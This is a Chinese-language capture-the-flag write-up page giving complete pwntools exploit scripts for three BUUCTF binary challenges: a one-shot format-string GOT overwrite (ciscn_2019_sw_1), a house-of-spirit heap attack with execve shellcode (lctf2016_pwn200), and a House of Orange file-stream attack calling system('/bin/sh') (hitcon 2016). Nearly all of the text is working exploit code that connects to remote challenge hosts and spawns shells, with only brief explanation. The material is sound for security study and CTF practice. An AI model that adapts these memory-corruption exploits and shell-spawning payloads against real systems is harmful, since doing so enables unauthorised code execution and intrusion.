第四页
题目12_ciscn_2019_sw_1
- 考点:
只能利用一次格式化字符串漏洞
-
格式化字符串漏洞之后会再统一归纳,到时再细讲这题。
-
直接贴出exp:
from pwn import *
# 32-bit target: p32() below packs each pointer as 4 little-endian bytes.
context.arch = 'i386'
p = remote('node5.buuoj.cn',25550)
#p = process('./ciscn_2019_sw_1')
#gdb.attach(p)
pause()
# Fixed addresses from the challenge binary (the 0x0804xxxx values suggest a
# non-PIE i386 build -- confirm against the ELF).
fini_addr = 0x804979C
main_addr = 0x8048534
sys_addr = 0x80483D0
printf_got = 0x804989C
# Values written as 16-bit halves with %hn:
#   printf_got      <- 0x83D0 (low half of sys_addr)
#   fini_addr       <- 0x8534 (low half of main_addr)
#   printf_got + 2  <- 0x0804 (high half of sys_addr)
# 0x8534
# 0x804 0x83D0
# %hn stores the number of characters printed so far as a 2-byte value, so the
# three writes are ordered by increasing count: 0x83D0, then +0x164 = 0x8534,
# then +0x82D0 = 0x10804, whose low 16 bits are 0x0804.
payload = b'%'+ str(0x83d0).encode('utf-8') + b'c%14$hn'
payload += b'%'+ str(0x8534-0x83D0).encode('utf-8')+b'c%15$hn'
payload += b'%'+ str(0x82D0).encode('utf-8')+b'c%16$hnaaa'
# The three directives plus 'aaa' total 40 bytes, so the pointers below start
# on a 4-byte boundary; with the buffer at printf argument 4 (cf. the commented
# fmtstr_payload(4, ...) call) they sit at arguments 14, 15 and 16 -- the
# indices used by the %hn directives above.
payload += p32(printf_got)+p32(fini_addr)+p32(printf_got+2)
#payload+= b'%'+str(0x804).encode('utf-8')+b'c%14$hnaaaaaaa'
#payload+= p32(fini_addr)+p32(fini_addr+2)
#payload= fmtstr_payload(4,{printf_got : sys_addr})
#payload += b'%' + str(0x8534).encode('utf-8') +
print('len--->',len(payload))
p.sendline(payload)
#payload = fmtstr_payload(4,{})
# Second input: presumably passed to printf again, which now resolves to sys_addr.
p.sendline(b'/bin/sh\x00')
p.interactive()
题目14_lctf2016_pwn200
- 考点:
house_of_spirit
- 这题在
house_of_spirit
那边有详细解答,这里就直接给 exp。
from pwn import *
context(arch='amd64',log_level='debug')
p = process("./pwn200")
#p = remote(b'node5.buuoj.cn',25055)
gdb.attach(p,"b *0x400B1F\n b *0x400824\nb *0x400A5F\n b *0x40092C")
payload = b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaa'
pause()
p.sendafter(b'who are u?\n',payload)
p.recvuntil(b'faaaaaaa')
stack_addr = p.recvline()
print(stack_addr)
stack_addr=stack_addr[:6]
print('stack_addr------->',stack_addr)
stack_addr=int.from_bytes(stack_addr,'little')
ptr = stack_addr-0xf0+0x40
payload1 = b'48'
p.sendlineafter(b'give me your id ~~?\n',payload1)
# payload2构造fake_chunk
payload2 = p64(0x0)+p64(0x61)+b'a'*0x28+p64(ptr)
#payload2 = b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaa'#aaaahaaaaaaa'
p.sendafter(b'give me money~\n',payload2)
payload3 = b'2'
p.sendlineafter(b'your choice :',payload3)
payload4 = b'1'
p.sendlineafter(b'your choice :',payload4)
payload5 = b'80'
p.sendlineafter(b'how long?\n',payload5)
a = asm("""
mov rbx,0x0068732f6e69622f
push rbx
mov rdi,rsp
xor rsi,rsi
xor rdx,rdx
mov rax,59
syscall
""")
sh = a
print("-------->",len(sh))
payload6 = sh +b'a'*3 + b'a'*0x18 + p64(ptr)
p.sendlineafter(b'give me more money :',payload6)
payload = b'3'
p.sendlineafter(b'your choice :',payload)
p.interactive()
题目29_houseoforange_hitcon_2016
-
考点:
house of orange
-
这题也在
house_of_orange
中有具体分析,这里也直接贴出 exp。exp 如下:
from pwn import *
context.log_level = 'debug'
#p = process('')
p = remote('node5.buuoj.cn',25648)
# The symbol offsets used below ('system', '__malloc_hook', '_IO_list_all')
# are read from this libc build; it must match the remote target.
libc = ELF('libc-2.23.so')
#libc = ELF('/home/myheart/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6')
def add(size,name,price=1,color=2):
    """Menu option 1: create an entry through the module-level tube `p`.

    Answers the prompts in order: the length (`size`), the raw `name` bytes
    (sent without a trailing newline), then `price` and `color`, each as
    decimal ASCII.
    """
    def as_ascii(value):
        # Same bytes as str(value).encode(): decimal digits, UTF-8.
        return str(value).encode()

    p.sendlineafter(b'Your choice :', b'1')
    p.sendlineafter(b'Length of name :', as_ascii(size))
    # sendafter, not sendlineafter: the name has to arrive byte-exact.
    p.sendafter(b'Name :', name)
    for prompt, value in ((b'Price of Orange:', price), (b'Color of Orange:', color)):
        p.sendlineafter(prompt, as_ascii(value))
def show():
    """Menu option 2: ask the program to print the current entry (via `p`)."""
    choice = b'2'
    p.sendlineafter(b'Your choice :', choice)
def edit(size,name,price=1,color=2):
    """Menu option 3: rewrite the current entry through the module-level tube `p`.

    Same answer sequence as add(): length (`size`), raw `name` bytes, then
    `price` and `color` as decimal ASCII.  Note the prompt here is b'Name:'
    (no space), unlike the create path.
    """
    def as_ascii(value):
        # Same bytes as str(value).encode(): decimal digits, UTF-8.
        return str(value).encode()

    p.sendlineafter(b'Your choice :', b'3')
    p.sendlineafter(b'Length of name :', as_ascii(size))
    # sendafter, not sendlineafter: the name has to arrive byte-exact.
    p.sendafter(b'Name:', name)
    for prompt, value in ((b'Price of Orange:', price), (b'Color of Orange:', color)):
        p.sendlineafter(prompt, as_ascii(value))
#gdb.attach(p)
# First entry: a 0x3b0-byte name.
add(0x400-0x10-0x40,b'aaa',10)
# Overflow through edit(): 0x500 bytes written into the 0x3b0-byte name.
# After 0x3b8 bytes of filler come a 0x21 chunk header, the 0xc / 0x20 pair
# (presumably the entry's price/colour fields) and then 0xc01, which in the
# House of Orange technique this writeup names lands on the top chunk's size
# field -- confirm the layout in a debugger.
payload = b'a'*0x3b8+p64(0x21)+p32(0xc)+p32(0x20)+p64(0)
payload +=p64(0)+p64(0xc01)
edit(0x500,payload,12)
# A request larger than the shrunken top chunk; the writeup relies on the old
# top chunk being moved to the unsorted bin by this call.
add(0x1000,b'asdasd',10)
# Reuse that chunk with a one-byte name so show() prints the stale libc pointer
# left in it (only its low byte is overwritten, with 0x10).
add(0x500,b'\x10',10)
show()
p.recvuntil(b'Name of house : ')
libc_x = u64(p.recvline()[:-1].ljust(8,b'\x00'))
print('libc_x--->',hex(libc_x))
# Leak -> libc base; 1520 + 0x10 is the leaked pointer's distance past
# __malloc_hook in this libc build.
libc_addr = libc_x - libc.symbols['__malloc_hook']-1520-0x10
sys_addr = libc_addr + libc.symbols['system']
# 104
io_list_all = libc_addr + libc.symbols['_IO_list_all']
main_arena = libc_addr + libc.symbols['__malloc_hook'] +0x68
# Overwrite 16 bytes so show() prints the heap pointer that follows them.
edit(0x10,b'1'*0x10,1)
show()
p.recvuntil(b'Name of house : 1111111111111111')
heap_addr = u64(p.recvline()[:-1].ljust(8,b'\x00'))
print('heap_addr--->',hex(heap_addr))
# Heap address the fake structure below is expected to land at (binary-specific offset).
heap_dst_addr = heap_addr+1328#2608
print('io_list_all--->',hex(io_list_all))
# Fake chunk + fake _IO_FILE (glibc 2.23 layout, per the House of Orange writeup);
# offsets are relative to the fake chunk, which follows 0x520 bytes of filler:
#   +0x00 '/bin/sh\0' (doubles as the string system() receives), +0x08 size 0x61
#   +0x10 fd = main_arena, +0x18 bk = _IO_list_all - 0x10
#   +0x20 / +0x28: _IO_write_base = 2 < _IO_write_ptr = 3 (the "io_write_base" note below)
#   +0x78 sys_addr, +0xd8 vtable pointer = heap_dst_addr + 0x60 -- i.e. the fake
#   structure + 0x60 if heap_dst_addr is its address, so the vtable's +0x18 slot
#   is sys_addr.  Confirm the field offsets against libc-2.23.
payload = b'b'*(0x500+0x20)#+p64(0)+p64(0x21)+b'a'*0x10
payload += b'/bin/sh\x00'+p64(0x61)
payload += p64(main_arena) + p64(io_list_all-0x10)
payload += p64(0x2) + p64(0x3) # io_write_base
payload += p64(0)*9+p64(sys_addr)
payload += p64(0)*11+p64(heap_dst_addr+0x60)
#pause()
print('heap_dst_addr',hex(heap_dst_addr))
print('main_arena',hex(main_arena))
#pause()
edit(0xc00,payload,66)
pause()
# NOTE(review): str(1) is an ASCII str that pwntools encodes on send; b'1'
# would match the bytes used everywhere else in this file.
p.sendlineafter(b'Your choice : ',str(1))
p.interactive()